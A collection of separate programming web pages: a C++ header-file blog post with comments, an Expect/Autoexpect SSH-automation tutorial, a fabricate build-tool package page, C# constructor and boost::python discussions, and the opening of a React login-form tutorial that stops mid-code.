When I preprocessed this 5-line program it wound up being roughly 200,000 lines of source code for the compiler to parse. Now imagine what it is like in your project if every source file includes windows.h. You can imagine that parsing 200k lines of declarations slows down the compiler a bit. What else? Well, header files seem redundant. We have to type class names, method names, parameter lists, etc. twice. While that’s certainly not the most costly part of developing a C++ project, it does probably slow your thought process down a little. It also creates additional maintenance. If you change a parameter list in one place you need to change it in another. Again, not a huge cost but a real life cost. We’re still not done yet – I can add a few more potential issues. Header files change depending on the context in which they are preprocessed — or to say it more succinctly they have isolation problems. What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H? Well, that’s something you as a coder have to take time to deal with. Along those same lines, if you have a really big project without carefully designed headers, you might notice differences in compile-time (or even potentially run-time) behavior depending on the order in which you include headers. It’s not the end of the world, but it has a cost that you have to pay to investigate and fix the problem. I think most C/C++ coders would agree that the preprocessor comes with a price tag and a long list of potential pitfalls. Well, it’s not all bad right? Certainly. The first benefit I’m thinking of is the most interesting to me. We have a situation in C/C++ where we have to declare before use, and we put all those shared declarations in header files. We can easily produce separate compilation units that are mutually-dependent in this way. But because the mutual dependencies are satisfied by the header files, in general all of our source files can be compiled in parallel. 
I think most people would agree that this parallelism is a good thing. Take a look at counter-examples to this. Say you’re compiling a C# program. First off, you probably rarely compile that program one source file at a time. You pass a collection of source files to the compiler, the same way you pass those files to the C/C++ compiler. But the C# compiler must treat that batch of files differently. The C/C++ compiler can compile them all separately and then finally consider them as a unit for linking purposes. For the C# case, the compiler has to consider all of those source files somewhat simultaneously because they can have inter-dependencies: you can refer to a class in another source file without having to give a declaration of it first. In short, in C/C++ a translation unit is always a single source file and headers, whereas in C# the translation unit is potentially multiple source files. At the very least, that makes it seem more difficult to parallelize the C# build process. No doubt it is doable, but there will be some amount of overhead associated with this issue. You can think of this as the C/C++ coder paying the cost of this overhead by maintaining header files. No doubt there are other benefits you can think of to header files. For instance you can use the macro preprocessor to add rudimentary syntax to our language, to help “automate” some tasks. What can we do about it? I’m going to discuss two proposals. One of them is not mine at all and regards modules for C++. The other is perhaps a more practical tool that might help you diagnose issues with header files in your codebase. The word “module” has a lot of different meanings, even in the context of the coding world. I would say that many programming systems out there (notice this does not include C and C++) provide module functionality which is some joining of the concepts of separate compilation and namespaces. 
C and C++ give us facilities for separate compilation, and C++ gives us namespaces, but it does not give us a unified feature that encapsulates these together, allowing us to refer to a separately compiled module and import selected symbols from it. Enter Vandevoorde's Modules for C++ proposal (). This gives us a mechanism by which we refer to potentially previously-compiled modules instead of including source code of declarations in our projects. This has some important benefits in terms of the caveats pointed out above; for example it does have isolation properties and it does not have the maintenance burden associated with the redundancy of header files. I can see usage of this feature negatively impacting the parallelism property if used in certain ways. For example (and similar to the C# case), if each source file in your project is a separate module, the compiler will have to analyze dependencies before attempting to compile the files in parallel. Luckily, the "import" statements give it some clues about these dependencies and can probably be scanned quickly, so there are no doubt ways to solve that problem, but there will be some amount of overhead. I don't have much else to add to Vandevoorde's discussion in that paper; it is very thorough, and if you're interested in the design of such a module system and potential issues I encourage you to read it. As fun as it is to consider redesigning the world, what could we potentially do today, without changing the infrastructure of header files, to make things better? I can envision tools that generate headers, or that scan your header files and greater code-base and attempt to diagnose problems for you. Most of what I argued above as problems with header files had to do with a cost involving work for a human programmer. Well, maybe an automated tool can help reduce or eliminate that cost in some cases. The first suggestion is around "automagically" generating headers.
Think of a compiler which analyzes your C and/or C++ source and extracts just declarations into a minimal header file. You might have a source file which includes windows.h and then declares several classes. The header file would need to contain declarations of those classes, and probably just a few of the typedefs declared in windows.h and the various headers it includes. The result would most likely be fairly short; perhaps all you need to declare those classes is a few typedefs from windows.h like HMODULE, HWND, etc. This tool could potentially be integrated into your IDE so that when you change the source file it automatically updates the header if necessary. For efficiency, the tool could assume that system headers like windows.h don't change. Another suggestion for efficiency might be to have the tool generate a header for an entire library instead of at the single-translation-unit level. Such a tool seems like it could potentially help with the maintenance and build time issues. That whole windows.h header would need to be parsed by the header-generating tool, but that cost is amortized. It is paid only when you modify that source file, and you reap the rewards every time you compile another source file that includes the associated header. I see potential problems in this area, but if you have a code-base that is partitioned the right way, you might even be able to check in those generated headers and save even more compile time throughout your development team. What about other issues, such as isolation? The header-generating tool might be able to help with some of the issues there by creating "well behaved" header files. For instance it might generate preprocessor code that saves and restores the state of macros inside the context of the file, or generate headers that don't use any preprocessor features other than perhaps guard macros at the beginning and end of the file.
But what would likely be more useful is some sort of tool to analyze your headers. I'll give a few simple examples. It could look for isolation issues such as two different header files in your INCLUDE path with the same file name or that use the same guard macro. It could find headers that don't have proper guard macros. It could build a dependency graph that shows you how one header's definitions impact the definitions of another, and what the include graph looks like for particular headers and source files. Such an analysis tool might help you get your build times down as well. For instance it could scan your source files and tell you that it is unnecessary to include a particular header because none of its declarations are used. Or it might tell you that instead of including foo.h, which includes bar.h, you could just include the latter because this particular source file only uses declarations from bar.h. I'm afraid I've used up my time and space for this post, but I hope it was an interesting read, and got you thinking about what features regarding the preprocessor and header files might make you more productive in your C and C++ codebase. Please leave comments if you liked these ideas, didn't like them, or have your own. Thanks for reading! Richard

I've found that precompiled headers massively cut down compile times when used properly, but determining which files are most effective in the PCH, and which files are still missing, is time consuming. Another thing that would help is to get the PSDK team to clean up the rampant #define abuse in the Win32 headers. I could speed up my build if I put windows.h in the PCH, but I've been burned too many times by symbols like OpenRaw getting #defined, so I partition it off as much as I can, and the files that have to include it compile quite slowly. And having two PCHs in a project is error-prone. Finally, it seems like Intellisense doesn't take advantage of PCHs.
When I traced CreateFile() calls out of FEACP to track down what was triggering an Intellisense infinite loop, I noticed it reading the same files over and over.

You can use a script to embed #pragma message("Compiling _filename_") directives within each header included in your project. Then search through the build log(s) to count what's compiled most frequently. It's then a bit easier to decide what to precompile.

Regarding your statement: "What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H". Isn't this type of header guard unnecessary since we have #pragma once? In the past I used these header guards but no longer do, after I noticed Visual Studio 2005 generates (.h) files having only a #pragma once and no longer having something like:

#if !defined(_MYDLG_H__)
#define _MYDLG_H__

My questions:
a) What version of VS added #pragma once?
b) Doesn't this replace old style header guards? (see above)
c) Are there any disadvantages to #pragma once?

@ jamome: I'm not Richard, but I can possibly answer your questions:
>> a) What version of VS added #pragma once?
From the looks of my VC6 header files, you need a compiler version (_MSC_VER) of greater than 1000. VC6 shipped with compiler version 1200.
>> b) Doesn't this replace old style header guards? (see above)
Probably not if you want to write portable code. If you don't care about portability, then it's probably fine to use #pragma once. Regarding your third question, I don't know of any, besides the portability issue.

Thanks everyone for their comments so far! In response to Jamome:
>> Regarding your statement: "What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H".
>> Isn't this type of header guard unnecessary since we have #pragma once?
The intent of the example was more along the lines of you as a coder having to integrate libraries from various sources, potentially code you didn't write and may not want to change for various reasons. In that case the library developer might not use #pragma once for portability or other reasons. I agree with ChrisR that I don't believe there are any particular disadvantages to #pragma once over the guard macro idiom, other than the portability issue. Hope that helps, Richard

Instead of choosing one over the other, do both! 🙂 Portable headers should use idempotency guards that look like this:

#ifndef PROJECTNAME_HEADERNAME_HPP
#define PROJECTNAME_HEADERNAME_HPP

#ifdef _MSC_VER
#pragma once
#endif

// Code goes here!

#endif // Idempotency

The portable "#ifndef PROJECTNAME_HEADERNAME_HPP" guard is for other compilers (some will recognize the guard in order to avoid opening the file again, as long as nothing exists outside of it), while the "#pragma once" is for Visual Studio (which tells it to avoid opening the file again, for faster builds of very large projects). The "#ifdef _MSC_VER" prevents other compilers from seeing the Visual Studio-specific pragma. Of course, Visual Studio headers do not necessarily follow this practice because they do not have to be portable. Prefixing your macros with your project name is a general practice that avoids clashes, since macros aren't aware of namespaces.
Stephan T. Lavavej
Visual C++ Libraries Developer

I liked the modules proposal a lot! Unfortunately, it's not going to be in the new C++ standard. The committee liked the idea, but thought that it was too much work to polish the proposal in time (before 2010), since there is no available compiler where it could be tested (IOW, it's too big and it's not "existing practice").
Probably modules will be standardised in the future, but it would be nice if compilers started to ship with a few optionally-enabled new features. If the programmer wants to test modules, or if he thinks they are useful to his project even if the syntax or semantics are not in their final form, the feature can be enabled.

We've been doing a lot of thinking lately about header files and modularity in C, and we've developed a tool called CMod that enforces modularity in C. The CMod web page () contains a short paper we wrote about our system and an earlier implementation. We have been improving the system since that paper was written, and we expect to have a new paper ready in a couple of weeks, with more evaluation and tighter rules. A finished implementation will be available then, too, but you can download the latest version from our web page. We look forward to comments you might have. -Mike (and Saurabh, Jeff, and Pat, the CMod team)

This is a really interesting topic. The application I work on is quite big and has been developed over a long period of time. Over time the dependencies (real and fake) have grown, but we try to clean it up bit by bit, and that takes a lot of time. The main problem is build times; we use Incredibuild to do parallel builds and that helps a lot. It sounds quite good to have a tool that could generate "well behaved" header files with a minimum of dependencies, and also a tool that can visualize dependencies. We built a small simple tool that can create an include graph from a source file and that helps a lot; it does not do any analysis of the graph to recommend what to do, but that would also help a lot. Another thing that I have thought about is sharing precompiled headers, and preferably being able to use several precompiled headers for a single project. We generate quite a large number of DLLs and several projects should be able to share a common precompiled header.
Anything that could help in this area is interesting and I'm looking forward to more of this.

Is there a preprocessor macro that can be checked to see if precompiled headers are being used for a particular compilation unit? I like to test my files to see if they explicitly include everything they actually need, and nothing extra, so I test compile them individually as I write them without using precompiled headers. However, they then include everything in stdafx.h un-precompiled, which is slow. I'd like to stick a guard in stdafx.h itself to ignore its contents if precompiled headers aren't being used.

The best way to improve build times is to build all your C++ files together in one 'bundled' cpp file like this:

#include "src1.cpp"
#include "src2.cpp"
#include "src3.cpp"
…

Yes, it means you might have to resolve name conflicts between duplicate static definitions, but these issues are usually trivial and the build-time improvement is dramatic, and the codegen is more optimal as well. Try it, you'll like it.

Richard, take a look at this link: it is a preprocessor tool to generate header files!
https://blogs.msdn.microsoft.com/vcblog/2007/04/19/header-files-and-the-preprocessor-cant-live-with-em-cant-live-without-em/
If you need to automate an interactive session, say logging in and running commands on a remote system, Expect is the tool to use. But what's better than creating a script to automate some repetitive task? Automating the creation of that script, of course. And, you can do just that with Autoexpect. Creating an Expect script can prove tedious, especially for those of us who have attention deficit disorders. It's hard to focus on each detail of a stepwise procedure to perform a simple but repetitious task. That's where Autoexpect saves the day. Autoexpect "watches" your keystrokes and writes them to an Expect script that you can then execute to perform the recorded task. Autoexpect isn't perfect but it beats taking the painfully manual approach to creating Expect scripts.

The Basics

To use Expect or Autoexpect, you will need the Tcl, Tk and Expect source code unless your distribution has Autoexpect packaged with Expect. Installation by either method is easy to accomplish, but your particular distribution might not include Autoexpect as part of the binary packages. Grab the sources for Tcl and Tk from the Tcl Developer Exchange and the Expect sources from the SourceForge.net Expect site. Compile Tcl first, then Tk and finally Expect. There's nothing tricky about these packages. Unzip them and compile and install each with a simple: ./configure ; make ; make install. Once you have all three installed, it's time to try out some simple Expect scripts.

Lowered Expectations

Expect, as explained earlier, automates repetitive keyboard interactive tasks. To "teach" the script how to respond to prompts, you must know what the prompts are. The only way to do that is to step through a session yourself and record the prompts and responses as you go. After going through this exercise, you'll understand why you'd want to use Autoexpect. In this example, you're going to create an Expect script to connect to another system, login, run a ps command and then logout.
To begin, open your favorite text editor (vi, of course) and enter some commands.

#!/usr/local/bin/expect -f
spawn ssh slartibartfast
expect "password: "
send "beeblebrox\r"
expect "$ "
send "ps -ef\r"
send "exit\r"
expect eof

Save the file with any name you want and then make it executable. Now, an explanation of the Expect script you created. The spawn command launches an executable file for you. In this example, the command is ssh with host (slartibartfast). The "expect" line is the last part of the prompt that the interactive script should expect to "see" for this interactive session. In other words, the script receives a prompt for the password. On the next line, you "send" the password prompt your password and a return (\r). The next item that the script should expect to see is the "$" prompt. Now, you send it a command: ps -ef\r. Finally, send the remote system the exit command to end the session. Do you see how Expect works? You send a response to a prompt and then tell the script what to expect from the system. And, it goes back and forth like that for an entire session. You can also see how monotonous writing a very long or complicated script could become.

Great Expectations

Now that you've seen it done the hard way, have a look at Expect the way you'd have expected it to work. To use Autoexpect, simply type autoexpect at the command prompt. You're returned to an interactive shell while Autoexpect records your keystrokes, mistakes and all, into a file named script.exp. In this example, you'll step through the same procedure but this time, you'll perform the keystrokes as if Autoexpect isn't watching you.

$ autoexpect
autoexpect started, file is script.exp
$ ssh slartibartfast
beeblebrox     (typed in but not shown on screen)
ps -ef
exit
Connection to slartibartfast closed.
$ Ctrl-D
autoexpect done, file is script.exp
$

Before you execute the script, you'd better take a look at it. Remember that Autoexpect isn't perfect.
Rarely do you create a script that doesn't need editing. If you make any typos along the way, you'll have to clean them out, or each time you run your script, the typos will repeat along with your other commands. When you open your script.exp file, you'll notice a lot of text in it from the author, Don Libes of the National Institute of Standards and Technology. Scroll down to where your script begins with set timeout -1. Here is the script as Autoexpect created it (shortened due to the ps command output).

set timeout -1
spawn $env(SHELL)
match_max 100000
expect -exact "khess@debian5-1:~\$ "
send -- "ssh slartibartfast\r"
expect -exact "ssh slartibartfast\r
khess@slartibartfast's password: "
send -- "beeblebrox\r"
expect -exact "\r
Last login: Wed Jul 21 11:23:28 2010 from 192.168.1.77\r\r
\[khess@localhost ~\]\$ "
send -- "ps -ef\r"
expect -exact "ps -ef\r
UID        PID  PPID  C STIME TTY          TIME CMD\r
root         1     0  0 09:37 ?        00:00:04 init \[5\] \r
root         2     1  0 09:37 ?        00:00:00 \[migration/0\]\r
root         3     1  0 09:37 ?        00:00:00 \[ksoftirqd/0\]\r
root         4     1  0 09:37 ?        00:00:00 \[watchdog/0\]\r
root         5     1  0 09:37 ?        00:00:00 \[events/0\]\r
...
\[khess@slartibartfast ~\]\$ "
send -- "exit\r"
expect -exact "exit\r
logout\r
Connection to slartibartfast closed.\r\r
khess@debian5-1:~\$ "
send -- ""
expect eof

The set timeout -1 disables timeouts for the script. The next line spawns a shell in which to operate, which is an unnecessary step as you can see from your manually created script. The match_max 100000 line raises the buffer to 100000 bytes from the default 2000. The expect -exact "khess@debian5-1:~\$ " prompt is another unnecessary bit a la Autoexpect. The first line that corresponds to your manually created one is send -- "ssh slartibartfast\r". You should delete all lines that include expect -exact from your script as well as any echoed responses such as command results like those shown from the ps command. Shown below is the final "cleaned" script.
#!/usr/local/bin/expect -f
set timeout -1
match_max 100000
spawn ssh slartibartfast
expect "password: "
send -- "beeblebrox\r"
expect "$ "
send -- "ps -ef\r"
send -- "exit\r"
expect eof

As you can see, this Autoexpect script looks very similar to your manually created one after cleanup. There are cases where you would want to keep the -exact response, but if that response has anything to do with time, command output or anything that changes, you probably don't want to use it.

The Unexpected

You'll have to experiment with your scripts and adjust the timeout values, buffer sizes and prompts to ensure that you receive the desired results from them. Like any script, you'll spend a little time debugging it. The Autoexpect man page has a few helpful items in it, but for real help, look to the Expect man page. Remember that you're really using Expect behind the scenes. Autoexpect is a script that assists you in making your Expect scripts a little less manual to create, but don't expect too much from it. Now, you can tell your boss that you're expecting. In fact, tell him that you're autoexpecting, all in the name of automation and to save those labor pains. Next month, you can expect summer to really heat up with more system administration tips on redirected output and a little Bash magic from the trenches. See you there.

Hi Kenneth, what about expecting different command prompts (ending in $, ], >, etc.)? Is there a way to do it with Autoexpect or does it have to be modified manually? Cheers
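On the commenter's question about differing prompts ($, ], >): Expect's answer is `expect -re` with a regular expression rather than an exact string, and since Autoexpect only records exact matches, this is an edit you make by hand. Here is a quick Python check of one such pattern (the sample prompts are made up for illustration):

```python
import re

# One regex that matches several prompt endings: "$ ", "] ", or "> ".
# In an Expect script the equivalent would be: expect -re {[\]$>] $}
prompt = re.compile(r'[\]$>] $')

for p in ['user@host:~$ ', '[root@box ~] ', 'router> ']:
    print(bool(prompt.search(p)))  # True for all three
```

The character class treats $, ] and > as literals, and the trailing space anchors it to the end of a prompt, so one expect line covers several shells.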
http://www.linux-mag.com/id/7828/comment-page-1/
can you use cin and cout with the winapi ? such as drawtext() and the other functions ? if so how ? i was thinking something like that.

Code:
cout << drawtext() << endl

also a little trouble figuring out exactly what is going on with this ':' in the inline function. so bar(i) is in the scope of mytype2 or does it just share the variable i ? same i or different i ? passed by ? reference or address ?

Code:
public:
    Rectangle(int w = 0, int h = 0) : wide(w), high(h) {}

and

MyType::MyType(int i) : Bar(i) {
    // ...

MyType2::MyType2(int i) : Bar(i), m(i+1) {
    // ...

inline inside class rectangle with var wide and high ? yes ?

!giffcopy==idea.bad ? You realize why you can not do this ? because it would be considered regiffing. meow.

Code:
/* regiff.cpp */
#include <string>
#include <fstream>
using namespace std;

int main() {
    ifstream in("File.gif");    // Open for reading
    ofstream out("File2.gif");  // Open for writing
    string s;
    while (getline(in, s))      // Discards newline char
        out << s << "\n";       // ... must add it back
}
http://cboard.cprogramming.com/cplusplus-programming/122848-cin-cout-winapi.html
fabricate 1.29.0

The better build tool. Finds dependencies automatically for any language.

fabricate is a build tool that finds dependencies automatically for any language. It's small and just works. No hidden stuff behind your back. It was inspired by Bill McCloskey's make replacement, memoize, but fabricate works on Windows as well as Linux. Get fabricate.py now, learn how it works, see how to get in-Python help, or discuss it on the mailing list.

Features

- Never have to list dependencies.
- Never have to specify cleanup rules.
- The tool is a single Python file.
- It uses MD5 (not timestamps) to check inputs and outputs.
- You can learn it all in about 10 minutes.
- You can still read your build scripts 3 months later.
- Now supports parallel building

Show me an example!

from fabricate import *

sources = ['program', 'util']

def build():
    compile()
    link()

def compile():
    for source in sources:
        run('gcc', '-c', source+'.c')

def link():
    objects = [s+'.o' for s in sources]
    run('gcc', '-o', 'program', objects)

def clean():
    autoclean()

main()

This isn't the simplest build script you can make with fabricate (see other examples), but it's surprisingly close to some of the more complex scripts we use in real life. Things to note:

- It's an ordinary Python file. Use the clarity and power of Python.
- No implicit stuff like CCFLAGS.
- Explicit is better: you tell fabricate what commands to run, and it runs them – but only if their inputs or outputs have changed.
- Where you'd use targets in make, you just use Python functions – build() is the default.
- You can easily "autoclean" any build outputs – fabricate finds build outputs automatically, just like it finds dependencies.

Using fabricate options

The best way to get started is to take one of the examples linked above and modify it to suit your project. But you're bound to want to use some of the options built into fabricate.
To get a list of these:

from fabricate import *
help(main)
help(Builder)

Using fabricate as a script, a la memoize

You can also use fabricate.py as a script and enter commands directly on the command line (see command line options). In the following, each gcc command will only be run if its dependencies have changed:

fabricate.py gcc -c program.c
fabricate.py gcc -c util.c
fabricate.py gcc -o program program.o util.o

Why not use make?

For a start, fabricate won't say "*** missing separator" if you use spaces instead of tabs. And you'll never need to enter dependencies manually, like this:

files.o : files.c defs.h buffer.h command.h
        cc -c files.c

Instead, you just tell fabricate to run('cc', 'file.c') and it'll figure out what that command's inputs and outputs are. Next time you build, the command will only get run if its inputs have changed, or if its outputs have been modified or aren't there. And you can use Python's readable string functions instead of producing write-only make rules, like this one from the make docs:

%.d : %.c
        @set -e; rm -f $@; $(CC) -M $(CPPFLAGS) $< > $@.$$$$; \
        sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; rm -f $@.$$$$

What about SCons?

SCons tempted us at first too. It's Python … isn't it? But just before it sucks you in, you realise it's actually quite hard to do simple things explicitly. Python says that explicit is better than implicit for a reason, and with fabricate, we've made it so you tell it what you want. It won't do things behind your back based on the 83 different tools it may or may not know about.

Credits

fabricate is inspired by Bill McCloskey's memoize, but fabricate works under Windows as well by using file access times instead of strace if strace is not available on your file system. Read more about how fabricate works. fabricate was originally developed by the B Hoyts at Brush Technology for in-house use, and we then released it into the wild.
It now has a small but dedicated user base and is actively being maintained and improved by Simon Alford, with help from other fabricate users.

License

Like memoize, fabricate is released under a New BSD license. fabricate is Copyright (c) 2009 Brush Technology.

- Author: Chris Coetzee
- Keywords: fabricate make python build
- License: New BSD License
- Platform: Operating System :: Microsoft :: Windows
- Categories:
  - License :: OSI Approved :: BSD License
  - Programming Language :: Python
  - Programming Language :: Python :: 2.6
  - Programming Language :: Python :: 2.7
  - Programming Language :: Python :: 3.2
  - Programming Language :: Python :: 3.3
  - Programming Language :: Python :: 3.4
  - Programming Language :: Python :: 3.5
  - Programming Language :: Python :: 3.6
  - Topic :: Software Development :: Build Tools
- Package Index Owner: chriscz, jjaques
- DOAP record: fabricate-1.29.0.xml
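The "MD5, not timestamps" feature listed above is the heart of how fabricate decides whether a command needs to be re-run. Here is a plain-Python sketch of that idea; it is illustrative only, not fabricate's actual code:

```python
import hashlib
import os
import tempfile

def md5_of(path):
    # Content hash: a touched-but-unchanged file hashes the same.
    with open(path, 'rb') as f:
        return hashlib.md5(f.read()).hexdigest()

seen = {}  # path -> hash recorded at the last "build"

def needs_rebuild(path):
    h = md5_of(path)
    if seen.get(path) == h:
        return False
    seen[path] = h
    return True

path = os.path.join(tempfile.mkdtemp(), 'input.txt')
with open(path, 'w') as f:
    f.write('v1')

print(needs_rebuild(path))  # True: never seen before
print(needs_rebuild(path))  # False: content unchanged
os.utime(path)              # "touch" -- timestamp changes, content doesn't
print(needs_rebuild(path))  # False: MD5 says nothing changed
```

The last line is the payoff over make: touching a file, or checking it out again from version control, doesn't force a rebuild unless its bytes actually changed.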
https://pypi.python.org/pypi/fabricate
There are many ways to approach object instantiation. In this article we'll cover a few of the patterns used to instantiate objects.

Part I. Standard "New-Uping"

The first way we learned to approach object instantiation was with the constructor method on the class. This is the tried and true (and only) way to actually make an instance of a class. The constructor is a method with no return type declared and has the same name as the class it is declared in. Right about now you're probably already thinking "Hey wait a minute! What about the many approaches you mentioned?!?" Well, all the different approaches are really just different ways to control where (and when) we new-up our objects, and I'll get to these cool tricks in Part II after we cover the basics.

The Default Constructor

So, to get started, when we declare a constructor as follows:

public class One : Number
{
    public One()
    {
    }
}

We new-up (instantiate) the object using the constructor we defined:

One objOne = new One();

Every time we make a new instance of the "One" class, the constructor method will be run. If there is actually code in the constructor, it will be executed on instantiation of the object. When the following class is instantiated:

public class Number
{
    protected Number()
    {
        Console.WriteLine(GetType().ToString() + " built");
    }
}

We'll get a call to the constructor and output to the console. With C#, if no constructor is defined, we get a default constructor automatically. This default constructor will have no parameters and will not do anything, and essentially be the same as if we had declared an empty constructor, so these two class declarations are equivalent.

No constructor defined (ends up the same as below):

public class One : Number
{
}

Default constructor defined (ends up the same as above):

public class One : Number
{
    public One()
    {
    }
}
No constructor defined (ends up the same as below): public class One:Number{} Default constructor defined (ends up the same as above): Changing the Default Constructor Also with C#, as soon as we declare a constructor with a signature different than the default constructor, we no longer get a default constructor like in the following two examples: Input parameter change: The default constructor has no parameters, so as soon as we declare an input parameter requirement on the constructor we loose the default constructor: public class One : Number{ public One(int x) { }} In this case we are now required to pass an integer on instantiation: One objOne = new One(3); Accessor change: the default constructor is public, so as soon as we declare that the constructor is private to the "One" class, we can no longer instantiate the object from outside the class. This probably seems strange right now, but we'll discuss how to use this in a bit. public class One : Number{ private One() { }} Providing Multiple Constructors We can provide multiple constructors, so if we want to have the choice of whether to supply a value to the constructor or not we'll just write two of them: public class One : Number{ private One() { } private One(int x) { }} This will allow us to instantiate by passing nothing or passing an integer when we new-up the "One" class so the following two declarations are now valid: One objOne = new One(3);One objOne = new One(); Using Constructors By now you're probably asking "Ok... Real nice constructors -n- all. I get it. But what's the point, really?" The point of constructors is to provide any initialization that the class needs. Let's say we have a property that tells us when the object was instantiated as in the following class. public class Startup{ private DateTime m_startDate; public DateTime StartDate { get { return m_startDate; } }} Ok, that's all fine and good until we need to initialize the value to the time the object was actually instantiated. 
To do this, we use the constructor:

public class Startup
{
    public Startup()
    {
        m_startDate = DateTime.Now;
    }

    private DateTime m_startDate;
}

Now we have a class where the value is guaranteed to be initialized.

Constructors Calling Constructors

If we use the previous example but want to be able to specify the start date, we can overload the constructor:

public Startup(DateTime startDate)
{
    m_startDate = startDate;
}

So now we can choose whether or not to specify the start date. If we don't specify it in the constructor, we get the default, which is DateTime.Now. This works fine, but to follow best practices and keep our sanity when maintaining the code, we should designate one (and only one) constructor as the "master" constructor where everything happens, so if there are changes in one of the constructors we don't have to hunt down what is happening where. The "master" constructor will be the one that sets all the member variables in the class:

public class Startup
{
    // Master constructor:
    // It sets all the values in the class
    public Startup(DateTime startDate)
    {
        m_startDate = startDate;
    }
}

Now what we want to do is have all the other constructors call the "master" constructor. The syntax for chaining our constructors is as follows:

public Startup() : this(DateTime.Now)
{
}

So now our default constructor will call our "master" constructor and pass the current date and time. If we choose to change the default time in the default constructor, we just update the value passed from the default constructor to the "master" constructor. This may not seem like a big deal now, but if we have dozens of constructors on an object, it is a good way to organize them so we get consistent behavior and don't repeat code somewhere we could miss updating.

public Startup() : this(DateTime.MinValue)
{
}

Calling Constructors through the Inheritance Chain

The final thing we'll look at is calling constructor methods through the inheritance chain.
If we have a base class with a parameterized constructor:

public abstract class Animal
{
    public Animal(string name)
    {
        m_name = name;
    }

    private string m_name;

    public string Name
    {
        get { return m_name; }
        set { m_name = value; }
    }
}

We can call the constructor through a derived class by using the base keyword. So in the following class the constructor's parameters are passed to the base constructor:

public class Cat : Animal
{
    public Cat(string name) : base(name)
    {
    }
}

Well, that's pretty much it for the constructor and the main way to "new-up" objects. In the next article we'll look at different patterns for controlling the instantiation of our classes.

Until next time,
Happy coding
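The single "master" constructor idea above is not C#-specific. As a closing illustration, here is the same pattern sketched in Python (the Startup class name is borrowed from the article; a default argument plays the role of the chained default constructor):

```python
from datetime import datetime

class Startup:
    # The lone "master" initializer: the only place the start date is
    # ever assigned, mirroring the article's advice.
    def __init__(self, start_date=None):
        # Passing nothing behaves like the chained default constructor,
        # which forwarded DateTime.Now to the master constructor.
        self.start_date = start_date if start_date is not None else datetime.now()

s1 = Startup()                       # default: current date and time
s2 = Startup(datetime(2007, 6, 23))  # caller-specified start date
```

Because every path funnels through one initializer, changing how the field is stored later means touching exactly one method.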
http://www.c-sharpcorner.com/UploadFile/rmcochran/instantiationI06232007000158AM/instantiationI.aspx
I've been testing out boost::python for wrapping some C++ code that I've written, but I had some weird results trying to get the "__str__" functionality to work correctly.

I have a base C++ class that has a virtual function in it (with a default value). I derive another C++ class from it and change the virtual function. I also create a std::ostream << operator so that I can print this class. Here is the code:

struct Base
{
    virtual ~Base() {}
    virtual int f() const { return 12345; }
};

struct Derived : Base
{
    virtual int f() const { return 54321; }
};

inline int call_f(Base& b) { return b.f(); }

inline std::ostream& operator<<(std::ostream& os, const Base& b)
{
    return os << "A: " << b.f() << std::endl;
}

///// Begin Python Wrapper

#include <boost/python.hpp>
using namespace boost::python;

struct BaseWrap : Base
{
    BaseWrap(PyObject* self_)
        : self(self_)
    { }

    BaseWrap(PyObject* self_, const Base& b)
        : self(self_)
        , Base(b)
    { }

    int f() const { return call_method<int>(self, "f"); }
    int default_f() const { return Base::f(); }

    PyObject *self;
};

BOOST_PYTHON_MODULE(test2)
{
    class_<Base, BaseWrap>("Base")
        .def("f", &Base::f, &BaseWrap::default_f)
        .def(self_ns::str(self))
        ;

    class_<Derived, bases<Base> >("Derived")
        // Without this, it doesn't work
        .def(self_ns::str(self))
        ;

    def("call_f", call_f);
}

///// End Python Wrapper

First, the tutorial doesn't include the need for BaseWrap to have both constructors, but it wouldn't compile without both of them (I am using boost-1.31.0 with MSVC 2003 and python 2.3, though I am trying to get it all to work with GCC 3.2.2).

Also, I can test that without the python wrapper, in a simple C++ program I can do

std::cout << Base() << std::endl;

and

std::cout << Derived() << std::endl;

and I get the correct output. So I know that in C++ the << operator is calling the appropriate overloaded function.
However, when I load this library in python, if I don't define .def(self_ns::str(self)) for the Derived class, it prints out the exact string for the Base(). Here is the exact python code that I type:

>>> import test2
>>> b = test2.Base()
>>> b.f()
12345
>>> test2.call_f(b)
12345
>>> print b
A: 12345
>>> d = test2.Derived()
>>> d.f()
54321
>>> test2.call_f(d)
54321
>>> print d
A: 12345

With __str__ redefined for the Derived class I get:

>>> print d
A: 54321

Which is what I want. What is really weird is that call_f() works correctly in python, even if I derive a class in python:

>>> class MyClass(test2.Base):
...     def f(self):
...         return 9876
...
>>> m = MyClass()
>>> m.f()
9876
>>> test2.call_f(m)
9876
>>> print m
A: 12345

Does anyone know why the call_f() operator is using the correct overload, but the __str__ operator isn't?

Thanks,
John
=:->
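For comparison, in pure Python an inherited __str__ does route through the overridden method — which is the behavior the poster expected the wrapped classes to show:

```python
# Pure-Python analogue of the wrapped classes: __str__ is defined once
# on the base and calls the (dynamically dispatched) f().
class Base:
    def f(self):
        return 12345

    def __str__(self):
        return "A: %d" % self.f()

class Derived(Base):
    def f(self):
        return 54321

print(Base())     # A: 12345
print(Derived())  # A: 54321 -- the inherited __str__ sees the override
```

So the surprising part of the report is specific to how boost::python binds self_ns::str(self) per exposed class, not to Python's own attribute lookup.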
https://mail.python.org/pipermail/cplusplus-sig/2004-February/006474.html
Create a Login Page

Let's create a page where the users of our app can log in with their credentials. When we created our User Pool we asked it to allow a user to sign in and sign up with their email as their username. We'll be touching on this further when we create the signup form.

So let's start by creating the basic form that'll take the user's email (as their username) and password.

Add the Container

Create a new file src/containers/Login.js and add the following.

import React, { Component } from "react";
import { Button, FormGroup, FormControl, ControlLabel } from "react-bootstrap";
import "./Login.css";

export default class Login extends Component {
  constructor(props) {
    super(props);

    this.state = {
      email: "",
      password: ""
    };
  }

  validateForm() {
    return this.state.email.length > 0 && this.state.password.length > 0;
  }

  handleChange = event => {
    this.setState({
      [event.target.id]: event.target.value
    });
  }

  handleSubmit = event => {
    event.preventDefault();
  }

  render() {
    return (
      <div className="Login">
        <form onSubmit={this.handleSubmit}>
          <FormGroup controlId="email" bsSize="large">
            <ControlLabel>Email</ControlLabel>
            <FormControl
              autoFocus
              type="email"
              value={this.state.email}
              onChange={this.handleChange}
            />
          </FormGroup>
          <FormGroup controlId="password" bsSize="large">
            <ControlLabel>Password</ControlLabel>
            <FormControl
              value={this.state.password}
              onChange={this.handleChange}
              type="password"
            />
          </FormGroup>
          <Button block bsSize="large" disabled={!this.validateForm()} type="submit">
            Login
          </Button>
        </form>
